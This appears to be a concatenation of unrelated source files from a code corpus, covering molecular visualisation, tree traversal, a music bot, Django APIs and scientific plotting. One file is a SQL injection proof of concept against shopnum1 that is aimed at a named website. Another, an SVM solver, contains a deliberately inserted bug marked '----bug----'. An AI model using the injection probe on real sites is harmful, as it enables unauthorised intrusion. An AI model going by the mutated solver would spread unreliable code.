cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(40.5), float(86.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,40.5,86.5], [20.326,41.875,84.711], color="blue red", name="Arrows_16.1944999695_4")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 1.000, 0.000] + [ALPHA, 0.6] + [SPHERE, float(24.6252880167), float(37.7325779305), float(84.4628325968), float(1.0)]
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(19.0), float(38.5), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([19.0,38.5,82.5], [17.965,41.525,82.457], color="red blue", name="Arrows_16.1944999695_5")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(20.0), float(36.0), float(83.0), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([20.0,36.0,83.0], [20.128,33.403,83.414], color="red blue", name="Arrows_16.1944999695_6")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(19.5), float(38.5), float(86.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([19.5,38.5,86.5], [16.732,39.933,86.734], color="red blue", name="Arrows_16.1944999695_7")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(39.5), float(83.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,39.5,83.5], [20.326,41.875,84.711], color="red blue", name="Arrows_16.1944999695_8")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(24.5), float(34.5), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([24.5,34.5,82.5], [24.977,33.392,79.234], color="red blue", name="Arrows_16.1944999695_9")
cmd.load_cgo(cluster_dict["16.1944999695"], "Features_16.1944999695", 1)
cmd.load_cgo(cluster_dict["16.1944999695_arrows"], "Arrows_16.1944999695")
cmd.set("transparency", 0.2,"Features_16.1944999695")
cmd.group("Pharmacophore_16.1944999695", members="Features_16.1944999695")
cmd.group("Pharmacophore_16.1944999695", members="Arrows_16.1944999695")
if dirpath:
f = join(dirpath, "label_threshold_16.1944999695.mol2")
else:
f = "label_threshold_16.1944999695.mol2"
cmd.load(f, 'label_threshold_16.1944999695')
cmd.hide('everything', 'label_threshold_16.1944999695')
cmd.label("label_threshold_16.1944999695", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
cmd.group('Pharmacophore_16.1944999695', members= 'label_threshold_16.1944999695')
cmd.bg_color("white")
cmd.show("cartoon", "protein")
cmd.color("slate", "protein")
cmd.show("sticks", "organic")
cmd.hide("lines", "protein")
|
[
"cradoux.cr@gmail.com"
] |
cradoux.cr@gmail.com
|
57563df581ac1c0a00ac5c91318c1352f0584a59
|
8336ea48994f9ecbddd9caf853d08f05b2e4c15c
|
/-二叉树-遍历.py
|
c2e78d315571c82f3bca1e8199f2110b88a3277b
|
[] |
no_license
|
swain-s/lc
|
fb2058931853b83aeb0737447a67e2fee08fdacd
|
9e793935b999540e20e6c7f025f3f765f43039af
|
refs/heads/master
| 2021-01-09T00:33:23.943824
| 2020-04-06T11:50:38
| 2020-04-06T11:50:38
| 242,172,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,498
|
py
|
# 问题描述:二叉树的前序、中序、后续和层次遍历
# 模板: 7
# 3 10
# 1 5 9 12
# 4 14
#
from a_bin_tree import root, tin_travel
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class BinTreeTreveral(object):
def __init__(self):
pass
def pre_order_traveral(self, root, output):
if root == None:
return
output.append(root.val)
self.pre_order_traveral(root.left, output)
self.pre_order_traveral(root.right, output)
#先序遍历的迭代版本
def pre_order_traveral_stack(self, root):
output = []
if root == None:
return output
stack = []
cur = root
while cur or len(stack) > 0:
if cur:
stack.append(cur)
output.append(cur.val)
cur = cur.left
else:
cur = stack.pop()
cur = cur.right
return output
def in_order_traveral(self, root, output):
if root == None:
return
self.in_order_traveral(root.left, output)
output.append(root.val)
self.in_order_traveral(root.right, output)
#中序遍历的迭代版本
def in_order_traveral_stack(self, root):
output = []
if root == None:
return output
stack = []
cur = root
while cur or len(stack) > 0:
if cur:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
output.append(cur.val)
cur = cur.right
return output
def post_order_traveral(self, root, output):
if root == None:
return
self.post_order_traveral(root.left, output)
self.post_order_traveral(root.right, output)
output.append(root.val)
def level_order_traveral(self, root):
pass
if __name__ == "__main__":
S = BinTreeTreveral()
pre_arr = []
S.pre_order_traveral(root, pre_arr)
print(pre_arr)
pre_arr_stack = []
print(S.pre_order_traveral_stack(root))
in_arr = []
S.in_order_traveral(root, in_arr)
print(in_arr)
in_arr_stack = []
print(S.in_order_traveral_stack(root))
post_arr = []
S.post_order_traveral(root, post_arr)
print(post_arr)
|
[
"shenkun@bupt.edu.cn"
] |
shenkun@bupt.edu.cn
|
6b986ebc0f99796b46a53f789dadc82ecf2fcd69
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_forgivable.py
|
17e88f7334c72b963bdb051e7591385f4638ce97
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
#calss header
class _FORGIVABLE():
def __init__(self,):
self.name = "FORGIVABLE"
self.definitions = [u'used to say that you can forgive something because you understand it: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
b8709d1ed22fe57824a0b3ea1da243b08abaeccc
|
e281ce2330656a6a0a7f795f535f78881df8b5ba
|
/Python Study/Backup All the file/Common/ZipFile.py
|
c11a684f7044dbb2a6408fa18934115512d93791
|
[] |
no_license
|
sunruihua0522/SIG-PyCode
|
70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e
|
483a67bf679f54ab7405c2362d9cfe47daa2bc0f
|
refs/heads/master
| 2020-07-12T14:46:32.588227
| 2020-04-02T04:37:02
| 2020-04-02T04:37:02
| 204,842,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
import zipfile
import os
from tqdm import tqdm
class ZipFile:
@staticmethod
def zipDir(dirpath,outFullName):
"""
压缩指定文件夹
:param dirpath: 目标文件夹路径
:param outFullName: 压缩文件保存路径+xxxx.zip
:return: 无
"""
zip = zipfile.ZipFile(outFullName,"w",zipfile.ZIP_DEFLATED)
for path,dirnames,filenames in os.walk(dirpath):
# 去掉目标跟路径,只对目标文件夹下边的文件及文件夹进行压缩
fpath = path.replace(dirpath,'')
for filename in tqdm(filenames,ncols = 50):
zip.write(os.path.join(path,filename),os.path.join(fpath,filename))
#print('%s\r\n%s\r\n\r\n\r\n'%(os.path.join(path,filename),os.path.join(fpath,filename)))
zip.close()
@staticmethod
def ZipFile(fileModelInfoLIst):
'''
:param fileModelInfoLIst: -> fileModelInfo of Array
:return: None
'''
for l in fileModelInfoLIst:
if (l.IsFile()):
pass
else:
strPre = l.Root.split('\\')[-1]
if (not os.path.exists(l.PathDes)):
os.makedirs(l.PathDes)
zip = zipfile.ZipFile(os.path.join(l.PathDes, '%s.zip' % strPre), "w", zipfile.ZIP_DEFLATED)
for path, dirpath, filenames in os.walk(l.FullName):
fpath = path.replace(l.FullName, '')
for filename in tqdm(filenames,ncols = 50):
condication1 = len(list(filter(lambda x: x.FullName == path, l.ListIn))) > 0
condication2 = len(
list(filter(lambda y: os.path.join(path, filename) == y.FullName, l.ListIn))) > 0
if (condication1 or condication2):
zip.write(os.path.join(path, filename), os.path.join(fpath, filename))
zip.close()
|
[
"--global"
] |
--global
|
b0122bfe88e38f332099985954a6a5d8bd7fda29
|
427ab1f7f7fe08f76fab6468f6ea24dc5bc2701d
|
/bugscan/exp-2424.py
|
c8dd3e9935415447b4bce32457f6ae74829b5ecb
|
[] |
no_license
|
gayhub-blackerie/poc
|
b852b2bcdba78185efd68817c31579247c6e4b83
|
8b7c95d765deb450c029a921031eb1c90418f2a7
|
refs/heads/master
| 2021-07-24T03:05:52.697820
| 2017-11-04T10:33:51
| 2017-11-04T10:33:51
| 107,093,079
| 1
| 0
| null | 2017-10-16T07:31:31
| 2017-10-16T07:31:31
| null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
#!/usr/bin/evn python
#--coding:utf-8--*--
#Name: shopnum1注入3
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0118352
#Author:xq17
def assign(service,arg):
if service=="shopnum1":
return True,arg
def audit(arg):
payload = "ProductListCategory.html?BrandGuid=ac69ddd9-3900-43b0-939b-3b1d438ca190%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--"
url=arg+payload
code, head, res, errcode,finalurl = curl.curl(url)
if code == 200 and "testXQ17" in res:
security_hole('find sql injection: ' + arg)
if __name__ == '__main__':
from dummy import *
audit(assign("shopnum1","http://www.dapeng.net/")[1])
|
[
"hackerlq@gmail.com"
] |
hackerlq@gmail.com
|
778ffa1ac232b1d139916fb722187dabf44fc75f
|
5f0a72ccc780a9649c6adb15ccab6ddcb02a146b
|
/marshmallow/core/mechanics/music.py
|
644a8e26dbbecfa004973ebc4fe8d6f3d4eccc2c
|
[] |
no_license
|
bretzle/Marshmallow-Bot
|
1eb020bdf910bd29b324a79a0ee1b094d13f72fc
|
72175c0f58e36c7b6325a6cb2224731434781aca
|
refs/heads/master
| 2021-09-01T16:56:23.727278
| 2017-12-28T01:11:15
| 2017-12-28T01:11:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,414
|
py
|
import asyncio
import functools
import hashlib
import os
from asyncio.queues import Queue
from concurrent.futures import ThreadPoolExecutor
import discord
import youtube_dl
ytdl_params = {
'format': 'bestaudio/best',
'extractaudio': True,
'audioformat': 'mp3',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': False,
'nocheckcertificate': True,
'ignoreerrors': True,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
}
class QueueItem(object):
def __init__(self, requester, item_info):
self.requester = requester
self.item_info = item_info
self.url = self.item_info['webpage_url']
self.video_id = self.item_info['id']
if 'uploader' in self.item_info:
self.uploader = self.item_info['uploader']
else:
self.uploader = 'Unknown'
self.title = self.item_info['title']
if 'thumbnail' in self.item_info:
self.thumbnail = self.item_info['thumbnail']
else:
self.thumbnail = 'https://i.imgur.com/CGPNJDT.png'
self.duration = int(self.item_info['duration'])
self.downloaded = False
self.loop = asyncio.get_event_loop()
self.threads = ThreadPoolExecutor(2)
self.ytdl_params = ytdl_params
self.ytdl = youtube_dl.YoutubeDL(self.ytdl_params)
self.token = self.tokenize()
self.location = None
def tokenize(self):
name = 'yt_' + self.video_id
crypt = hashlib.new('md5')
crypt.update(name.encode('utf-8'))
final = crypt.hexdigest()
return final
async def download(self):
out_location = f'cache/{self.token}'
if not os.path.exists(out_location):
self.ytdl.params['outtmpl'] = out_location
task = functools.partial(self.ytdl.extract_info, self.url)
await self.loop.run_in_executor(self.threads, task)
self.downloaded = True
self.location = out_location
async def create_player(self, voice_client):
await self.download()
audio_source = discord.FFmpegPCMAudio(self.location)
if not voice_client.is_playing():
voice_client.play(audio_source)
class MusicCore(object):
def __init__(self, bot):
self.bot = bot
self.db = bot.db
self.loop = asyncio.get_event_loop()
self.threads = ThreadPoolExecutor(2)
self.queues = {}
self.currents = {}
self.repeaters = []
self.ytdl_params = ytdl_params
self.ytdl = youtube_dl.YoutubeDL(self.ytdl_params)
async def extract_info(self, url):
task = functools.partial(self.ytdl.extract_info, url, False)
information = await self.loop.run_in_executor(self.threads, task)
return information
def get_queue(self, guild_id):
if guild_id in self.queues:
queue = self.queues[guild_id]
else:
queue = Queue()
self.queues.update({guild_id: queue})
return queue
@staticmethod
async def listify_queue(queue):
item_list = []
while not queue.empty():
item = await queue.get()
item_list.append(item)
for item in item_list:
await queue.put(item)
return item_list
|
[
"johnfish218@gmail.com"
] |
johnfish218@gmail.com
|
1f69cce9ab69c9327883e50c082b673410e47b63
|
57dfd89d63b3b52eed144653c8264d50fa9fba6e
|
/miembros/api.py
|
faf4e4a8eaed9ebaf9a89ff12fa7d84346885925
|
[] |
no_license
|
geovanniberdugo/siiom
|
c850620214a1a3b8b1fc83ab895c0601241da3b4
|
5e2b72aff7ac5e94a93b7575603114b4ea5f628a
|
refs/heads/main
| 2023-02-16T15:02:30.539674
| 2021-01-15T22:29:36
| 2021-01-15T22:29:36
| 330,036,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
from django.contrib.auth.decorators import permission_required
from django.utils.translation import ugettext as _
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.http import JsonResponse
from .forms import DesvincularLiderGrupoForm, ResetearContrasenaAdminForm
from .models import Miembro
from .decorators import user_is_cabeza_red
from common.decorators import login_required_api
from common import constants
from common.api import get_error_forms_to_json
@login_required_api
@user_is_cabeza_red # No hay soporte con JSON
def desvincular_lider_grupo_api(request, pk):
"""
Desvincula a un lider de un grupo de amistad
"""
miembro = get_object_or_404(Miembro.objects.filter(grupo__isnull=False), pk=pk)
if request.method == 'POST':
form = DesvincularLiderGrupoForm(data=request.POST)
if form.is_valid():
form.desvincular_lider()
return JsonResponse({'url': reverse('miembros:editar_perfil', args=(miembro.id, ))})
else:
errors = get_error_forms_to_json(form)
return JsonResponse(errors, safe=False)
return JsonResponse({constants.RESPONSE_CODE: constants.RESPONSE_DENIED})
@login_required_api
@permission_required('miembros.es_administrador', raise_exception=True)
def resetear_contrasena(request):
"""Permite a un administrador resetear la contraseña de un miembro."""
msg = 'La contraseña se reseteó correctamente y se envió un email al miembro con su nueva contraseña.'
msg2 = 'La nueva contraseña es la cedula del miembro.'
if request.method == 'POST':
form = ResetearContrasenaAdminForm(request.POST)
if form.is_valid():
form.resetear()
return JsonResponse({
'message': _(msg + msg2),
constants.RESPONSE_CODE: constants.RESPONSE_SUCCESS
})
errors = get_error_forms_to_json(form)
return JsonResponse(errors, safe=False)
return JsonResponse({constants.RESPONSE_CODE: constants.RESPONSE_DENIED})
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
c14afc507b95a9c36595c24c46ae812c7fcc71c9
|
92993cff825da80a8ff601572a0c52b0b7d3cbde
|
/algorithms/Svm/APG/L1/APG_L1_m41.py
|
b1c19880dfe598d8378581b2300d5a68093c2d18
|
[] |
no_license
|
yingzhuoy/MRs-of-linear-models
|
06e8b1f84b08c6aa77553813824cf35c1806c5a7
|
c3df8299e039a12613f2022b370b8c3e9c2dd822
|
refs/heads/master
| 2023-04-07T23:09:37.736952
| 2021-04-04T05:33:37
| 2021-04-04T05:33:37
| 265,124,549
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,864
|
py
|
import numpy as np
from numpy import linalg
from algorithms.clf import Clf
# L1-svm
import cvxopt
from cvxopt import matrix,solvers
## accelerate proximal gradient method
def backtracking(l0, x0, p, q, low, up):
# update x
beta = 0.5
l = l0
L0 = 0.5*x0.T*(p*x0) + q.T*x0
g0 = p*x0 + q
for k in range(128):
xp = x0 - l * g0
xp[xp < low] = low
xp[xp > up] = up
Lx = 0.5*xp.T*(p*xp) + q.T*xp
gt = (x0-xp) / l
#if Lx > L0 - l *(g0.T*gt) + 0.5*l*gt.T*(gt):
#----bug----
if Lx > L0 - l /(g0.T*gt) + 0.5*l*gt.T*(gt):
l = beta * l
else:
break
return xp, l
def projected_apg(p, q, bounds, step_size=0.1, max_iter=5000):
m = p.shape[0]
low, up = bounds
x = np.ones((m, 1), np.float64) * 0.5
y = x
p = p + np.diag(np.ones(m, np.float64)) * np.mean(p)
v, w = np.linalg.eigh(p)
# print(v)
# v[v < 0] = 1e-10
# p = w * np.diag(v) * w.T
l = 1/v[-1] - 1e-10
for k in range(max_iter): # heavy on matrix operations
# p = p + np.eye(p.shape[0]) * (.1/(k+1))
# saving previous x
y = x
# compute loss and its gradient
# gradient = p*x + q
# proximal mapping
# x = x - l * gradient
# x[x < low] = low
# x[x > up] = up
x, l = backtracking(l, y, p, q, low, up)
# if(np.linalg.norm(x1-x)):
# print('error', np.linalg.norm(x1-x))
# stop criteria
rnormw = np.linalg.norm(y-x) / (1+np.linalg.norm(x))
if k > 1 and rnormw < 1e-6:
#print('convergence!')
break
return x
class APG_L1_m41():
def fit(self, X, y):
m, n = X.shape
X = np.column_stack((X, np.ones((m, 1))))
y = y.astype(np.float64)
data_num = len(y)
C = 1.0
kernel = np.dot(X, np.transpose(X))
# np.outer()表示的是两个向量相乘,拿第一个向量的元素分别与第二个向量所有元素相乘得到结果的一行。
# p = np.matrix(kernel * np.outer(y, y)) * .5
# kernel = np.dot(X, np.transpose(X)) + np.eye(data_num) * (.5 / C)
p = np.matrix(np.multiply(kernel, np.outer(y, y)), np.float64)
q = np.matrix(-np.ones([data_num, 1], np.float64))
p = p + np.eye(data_num) * 0.1
bounds = (0, C)
alpha_svs = projected_apg(p, q, bounds)
# alpha_svs = alpha_svs1
y1 = np.reshape(y, (-1, 1))
alpha1 = alpha_svs
lambda1 = np.multiply(y1,alpha1)
w = np.dot(X.T, lambda1)
w = np.array(w).reshape(-1)
# b = np.mean(y1-np.reshape(np.dot(w, np.transpose(X)), [-1, 1]))
b = w[n]
w = w[0:n]
clf = Clf(w, b)
return clf
|
[
"yingzhuoy@qq.com"
] |
yingzhuoy@qq.com
|
dd0fa4ba786eb9d8f8734622a18724a5acb42751
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_occasioned.py
|
f6245b1a5cf35679f3af0adee45fb97bbfcfd1d5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
from xai.brain.wordbase.verbs._occasion import _OCCASION
#calss header
class _OCCASIONED(_OCCASION, ):
def __init__(self,):
_OCCASION.__init__(self)
self.name = "OCCASIONED"
self.specie = 'verbs'
self.basic = "occasion"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f1e5a981d26f50623a516c785ceb31ecc02bb287
|
2ed82c46dc08930bcf1a42bae6b50d0efd6e8899
|
/rho_T_plot/rhoTPlot_physical_EAGLE.py
|
1cb7f4fbbecf9894e961a7fa20fcaa11d676d703
|
[
"MIT"
] |
permissive
|
SWIFTSIM/swiftsimio-examples
|
3a96fb910c42fe90cd48a0974ea3b16678214204
|
f038df3aa12a129185857b5cee2d4a7c2c6b4d03
|
refs/heads/master
| 2020-04-30T23:01:02.966239
| 2020-02-14T12:18:09
| 2020-02-14T12:18:09
| 177,133,622
| 0
| 1
|
MIT
| 2020-02-14T12:18:11
| 2019-03-22T12:10:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,289
|
py
|
"""
Makes a rho-T plot. Uses the swiftsimio library.
"""
import matplotlib.pyplot as plt
import numpy as np
import h5py
from unyt import mh, cm, Gyr
from tqdm import tqdm
from matplotlib.colors import LogNorm
from matplotlib.animation import FuncAnimation
# Constants; these could be put in the parameter file but are rarely changed.
density_bounds = [1e-8, 1e5] # in nh/cm^3
temperature_bounds = [10 ** (3), 10 ** (8)] # in K
bins = 128
VMIN, VMAX = [1e0, 7.5e5]
# Plotting controls
cmap = "viridis"
def load_data(filename: str, n_files: int, to_read: str):
"""
Loads the data from snapshots made of multiple files.
"""
output = []
for file in tqdm(range(n_files), desc=f"Reading {to_read}"):
current_filename = f"{filename}.{file}.hdf5"
with h5py.File(current_filename, "r") as handle:
output.append(handle[to_read][...])
return np.concatenate(output)
def get_data(filename, n_files):
"""
Grabs the data (T in Kelvin and density in mh / cm^3).
"""
density = load_data(filename, n_files, "PartType0/Density")
# Already in K
temperature = load_data(filename, n_files, "PartType0/Temperature")
with h5py.File(f"{filename}.0.hdf5", "r") as handle:
print(handle["Header"].attrs["NumPart_Total"])
scale_factor = handle["Header"].attrs["Time"]
h = handle["Header"].attrs["HubbleParam"]
unit_density = handle["Units"].attrs["UnitDensity_in_cgs"]
mh = 1.673_723_6e-24
unit_density /= mh
print(len(density))
density *= unit_density
density *= h ** 2
density /= scale_factor ** 3
return density, temperature
def make_hist(filename, n_files, density_bounds, temperature_bounds, bins):
"""
Makes the histogram for filename with bounds as lower, higher
for the bins and "bins" the number of bins along each dimension.
Also returns the edges for pcolormesh to use.
"""
density_bins = np.logspace(
np.log10(density_bounds[0]), np.log10(density_bounds[1]), bins
)
temperature_bins = np.logspace(
np.log10(temperature_bounds[0]), np.log10(temperature_bounds[1]), bins
)
H, density_edges, temperature_edges = np.histogram2d(
*get_data(filename, n_files), bins=[density_bins, temperature_bins]
)
return H.T, density_edges, temperature_edges
def setup_axes():
"""
Creates the figure and axis object.
"""
fig, ax = plt.subplots(1, figsize=(6, 5), dpi=300)
ax.set_xlabel("Density [$n_H$ cm$^{-3}$]")
ax.set_ylabel("Temperature [K]")
ax.loglog()
return fig, ax
def make_single_image(filename, n_files, density_bounds, temperature_bounds, bins):
"""
Makes a single image and saves it to rhoTPlot_{filename}.png.
Filename should be given _without_ hdf5 extension.
"""
fig, ax = setup_axes()
hist, d, T = make_hist(filename, n_files, density_bounds, temperature_bounds, bins)
mappable = ax.pcolormesh(d, T, hist, cmap=cmap, norm=LogNorm(vmin=VMIN, vmax=VMAX))
fig.colorbar(mappable, label="Number of particles", pad=0)
fig.tight_layout()
fig.savefig("rhoTPlot_EAGLE.png")
return
if __name__ == "__main__":
import argparse as ap
parser = ap.ArgumentParser(
description="""
Plotting script for making a rho-T plot.
Takes the filename handle, start, and (optionally) stop
snapshots. If stop is not given, png plot is produced for
that snapshot. If given, a movie is made.
"""
)
parser.add_argument(
"-s",
"--stub",
help="""Stub for the filename (e.g. santabarbara). This is
the first part of the filename for the snapshots,
not including the final underscore. Required.""",
type=str,
required=True,
)
parser.add_argument(
"-n",
"--nfiles",
help="""Number of EAGLE files to read""",
type=int,
required=True,
)
# Run in single image mode.
args = vars(parser.parse_args())
make_single_image(
args["stub"],
n_files=args["nfiles"],
density_bounds=density_bounds,
temperature_bounds=temperature_bounds,
bins=bins,
)
|
[
"joshua.borrow@durham.ac.uk"
] |
joshua.borrow@durham.ac.uk
|
98c7fc6457ff198ee87f3568232bf6841406a99e
|
eacfc1c0b2acd991ec2cc7021664d8e79c9e58f6
|
/ccpnmr2.4/python/ccpnmr/format/converters/PalesFormat.py
|
cd5aa27d66e02596823c00d666e4173bae16967a
|
[] |
no_license
|
edbrooksbank/ccpnmr2.4
|
cfecb0896dcf8978d796e6327f7e05a3f233a921
|
f279ca9bb2d972b1ce075dad5fcc16e6f4a9496c
|
refs/heads/master
| 2021-06-30T22:29:44.043951
| 2019-03-20T15:01:09
| 2019-03-20T15:01:09
| 176,757,815
| 0
| 1
| null | 2020-07-24T14:40:26
| 2019-03-20T14:59:23
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,344
|
py
|
#!/usr/bin/python
"""
======================COPYRIGHT/LICENSE START==========================
ModuleFormat.py: Contains functions specific to PALES program conversions.
Copyright (C) 2010 Wim Vranken (European Bioinformatics Institute)
Brian Smith (University of Glasgow)
=======================================================================
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
A copy of this license can be found in ../../../../license/LGPL.license
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
======================COPYRIGHT/LICENSE END============================
for further information, please contact :
- CCPN website (http://www.ccpn.ac.uk/)
- MSD website (http://www.ebi.ac.uk/msd/)
- contact Wim Vranken (wim@ebi.ac.uk)
=======================================================================
If you are using this software for academic purposes, we suggest
quoting the following references:
===========================REFERENCE START=============================
R. Fogh, J. Ionides, E. Ulrich, W. Boucher, W. Vranken, J.P. Linge, M.
Habeck, W. Rieping, T.N. Bhat, J. Westbrook, K. Henrick, G. Gilliland,
H. Berman, J. Thornton, M. Nilges, J. Markley and E. Laue (2002). The
CCPN project: An interim report on a data model for the NMR community
(Progress report). Nature Struct. Biol. 9, 416-418.
Wim F. Vranken, Wayne Boucher, Tim J. Stevens, Rasmus
H. Fogh, Anne Pajon, Miguel Llinas, Eldon L. Ulrich, John L. Markley, John
Ionides and Ernest D. Laue (2005). The CCPN Data Model for NMR Spectroscopy:
Development of a Software Pipeline. Proteins 59, 687 - 696.
===========================REFERENCE END===============================
"""
import string
from ccpnmr.format.converters.DataFormat import DataFormat, IOkeywords
from ccp.format.general.Constants import defaultSeqInsertCode
from ccpnmr.format.general.Constants import distanceConstraintDefaultLowerLimit
from ccpnmr.format.general.Util import getNameInfo
from ccp.general.Util import getResonancesFromPairwiseConstraintItem
class PalesFormat(DataFormat):
def setFormat(self):
self.format = 'pales'
self.IOkeywords = IOkeywords
def setGenericImports(self):
self.getConstraints = self.getConstraintsGeneric
self.createConstraintFile = self.createConstraintFileGeneric
#
# Functions different to default functions in DataFormat
#
def setRawRdcConstraint(self):
self.constraintFile.constraints.append(self.rawConstraintClass(self.constraint.serial))
self.rawConstraint = self.constraintFile.constraints[-1]
#
# Have to get some sensible values out
#
lowerLimit = self.constraint.lowerLimit
upperLimit = self.constraint.upperLimit
targetValue = self.constraint.targetValue
if targetValue == None:
targetValue = (lowerLimit + upperLimit) / 2
self.rawConstraint.setRdcData(targetValue,error = self.constraint.error)
def setRawRdcConstraintItem(self):
self.rawConstraint.items.append(self.rawConstraintItemClass())
self.rawConstraintItem = self.rawConstraint.items[-1]
def setRawRdcConstraintItemMembers(self):
itemResonances = getResonancesFromPairwiseConstraintItem(self.item)
for i in range(0,2):
(chainCode,seqCode,spinSystemId,seqInsertCode,atomName) = getNameInfo(self.resSetNames[i])
resLabel = self.getResonanceResLabel(itemResonances[i])
self.rawConstraintItem.members.append(self.rawConstraintItemMemberClass(chainCode,seqCode,resLabel,atomName))
def getPresetChainMapping(self,chainList):
return self.getSingleChainFormatPresetChainMapping(chainList)
def getResonanceResLabel(self,resonance):
# copied from DyanaFormat.py (also in AquaFormat.py - scope for common function in Util?)
resLabel = None
chemCompVar = resonance.resonanceSet.findFirstAtomSet().findFirstAtom().residue.chemCompVar
namingSystem = chemCompVar.chemComp.findFirstNamingSystem(name = self.namingSystemName)
chemCompSysName = chemCompVar.findFirstSpecificSysName(namingSystem = namingSystem)
if not chemCompSysName:
chemCompSysName = chemCompVar.findFirstChemCompSysName(namingSystem = namingSystem)
if chemCompSysName:
resLabel = chemCompSysName.sysName
else:
resLabel = chemCompVar.chemComp.ccpCode.upper()
return resLabel
def createConstraintFileFormatSpecific(self):
# Here bit tricky because first have to get number of chains, and format
# doesn't really handle it. I'd do this by having a specific
# chain keyword for writing RDC constraints for PALES, if it's not set
# and there's only one chain, all good, otherwise throw an
# error or ask the user for the relevant chain, then filter out
# constraints (that's all in place in case it's needed, just ask). Wim
# I do something similar already in DataFormat.py, but it happens at a later stage in the workflow.
chains = []
for constraint in self.constraintList.constraints:
for item in constraint.sortedItems():
for fixedResonance in item.resonances:
if fixedResonance.resonanceSet:
refAtom = fixedResonance.resonanceSet.findFirstAtomSet().findFirstAtom()
if refAtom.residue.chain not in chains:
chains.append(refAtom.residue.chain)
seqStrings = []
for chain in chains:
# Filter out most ligands, hopefully.
if len(chain.residues) > 1:
seqStrings.append(chain.molecule.seqString)
if len(seqStrings) > 1:
print "Warning: multiple sequences present, picking first one"
print 'in', self
self.writeKeywds['oneLetterSequence'] = seqStrings[0]
|
[
"ejb66@le.ac.uk"
] |
ejb66@le.ac.uk
|
982438385f1000e3976346a2dc1120aabdcb9938
|
c66955c6fc178955c2024e0318ec7a91a8386c2d
|
/headfirst/example/example2.py
|
6f06549a6c1978e95a4a31f7b5543a9d99fc5481
|
[] |
no_license
|
duheng18/python-study
|
a98642d6ee1b0043837c3e7c5b91bf1e28dfa588
|
13c0571ac5d1690bb9e615340482bdb2134ecf0e
|
refs/heads/master
| 2022-11-30T17:36:57.060130
| 2019-11-18T07:31:40
| 2019-11-18T07:31:40
| 147,268,053
| 1
| 0
| null | 2022-11-22T03:36:51
| 2018-09-04T00:49:42
|
Python
|
UTF-8
|
Python
| false
| false
| 751
|
py
|
man=[]
other=[]
try:
